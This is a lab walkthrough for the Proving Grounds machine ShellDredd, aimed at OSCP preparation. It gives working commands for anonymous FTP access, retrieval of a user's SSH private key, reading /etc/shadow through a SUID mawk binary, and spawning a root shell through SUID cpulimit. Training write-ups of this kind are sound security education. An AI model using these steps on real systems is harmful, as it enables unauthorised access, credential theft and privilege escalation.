Offensive Security Proving Grounds OnSystemShellDredd Writeup | OSCP Writeup

The article details a penetration testing walkthrough for the Offensive Security Proving Grounds (OSPG) machine named ShellDredd, useful for OSCP (Offensive Security Certified Professional) preparation.

It covers key stages: information gathering with Nmap, gaining initial access via FTP anonymous login, using an SSH private key for further access, and performing Linux privilege escalation.

The guide highlights tools like GTFOBins for exploiting binaries like Mawk and Cpulimit to achieve root access.

Information Gathering & Enmeration

Nmap Scanning and the open ports

nmap -p- --open -sV -sT -sC 192.168.191.130 -v -oN nmap        

PORT      STATE SERVICE VERSION                                                              
21/tcp    open  ftp     vsftpd 3.0.3                                                         
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)                                       
| ftp-syst:                                                                                  
|   STAT:                                                                                    
| FTP server status:                                                                         
|      Connected to ::ffff:192.168.45.250                                                    
|      Logged in as ftp                                                                      
|      TYPE: ASCII                                                                           
|      No session bandwidth limit                                                            
|      Session timeout in seconds is 300                                                     
|      Control connection is plain text                                                      
|      Data connections will be plain text                                                   
|      At session startup, client count was 4                                                
|      vsFTPd 3.0.3 - secure, fast, stable                                                   
|_End of status                                                                              
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)        

FTP Anonymous Login

FTP Anonymous login can be discovered by trying “anonymous” as the username and password.

ftp 192.168.191.130 21                                       
Connected to 192.168.191.130.                                                                
220 (vsFTPd 3.0.3)                                                                           
Name (192.168.191.130:naveenj): anonymous                                                    
331 Please specify the password.                                                             
Password:                                                                                    
230 Login successful.        

SSH private key can be found after enumerating the directory content:

ftp> ls -lsa                                                                                                                                      
ftp> cd .hannah                                                                                                                                                                    
-rwxr-xr-x    1 0        0            1823 Oct 12  2024 id_rsa                               
226 Directory send OK.                                                                       
ftp> get id_rsa                                                                              
226 Transfer complete.                                                                       
1823 bytes received in 00:00 (8.97 KiB/s)                                                    
ftp>        

First Foothold Using SSH

ssh -i files/id_rsa hannah@192.168.191.130 -p 61000                                                                                   
hannah@ShellDredd:~$        

Linux Privilege Escalation

Binary Exploitation

We can check for files and binaries for permissions and especially the SUID bit set.

hannah@ShellDredd:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk #--strange binary        

Mawk from the above output stands out.

What is Mawk in Linux

In Linux, mawk is an implementation of the AWK programming language, optimized for efficiency and performance. It is used for text processing, particularly for extracting, manipulating, and reporting on data.

mawk processes lines of text based on user-defined patterns and actions, making it useful for tasks like searching text, performing calculations, and automating repetitive text-based tasks. It is typically faster and smaller than other AWK versions, such as the original AWK or gawk.

Exploiting Mawk Using GTFOBins

From GTFOBins:

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

We can apply the above practically and get the the hashes for the users root and hannah.

hannah@ShellDredd:~$ mawk '//' "/etc/shadow" | grep -iE 'root|hannah'        

Then we can copy the shadow and passwd file

unshadow passwd shadow > hashes        

But this will lead to a dead end if you try to crack the hashes using john the ripper of hashcat therfore this was mentioned for informational purposes.

Exploiting Cpulimit using GTFOBins

What is Cpulimit?

cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a specific process. It is useful when you want to restrict a process from using too much CPU, ensuring that it does not consume all available resources, which could impact system performance or other processes. Unlike the nice or renice commands, which prioritize CPU access for processes, cpulimit actively throttles the CPU usage of a given process.

Here’s a basic example of how you might use cpulimit:

sudo cpulimit -p 12345 -l 30        

In this example:

• -p 12345 specifies the PID of the process to limit.
• -l 30 limits the process to 30% of the CPU.

Options:

• -e <executable>: Limits CPU usage based on the executable name.
• -p <pid>: Limits CPU usage of a process by its PID.
• -l <percentage>: Sets the CPU usage limit as a percentage.
• -b: Run in the background.
• -z: If the process is not running, wait for it to start before limiting CPU usage.

Example:

To limit a process called myprocess to 20% CPU usage, you can run:

bashCopy codesudo cpulimit -e myprocess -l 20        

Limitations:

• cpulimit may not work as effectively on processes that frequently fork or run for a very short duration.
• It doesn’t work system-wide and only affects the specified process.

From GTFOBins:

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

Applying this practically:

./cpulimit -l 100 -f -- /bin/sh -p
# whoami 
root        

You can also watch: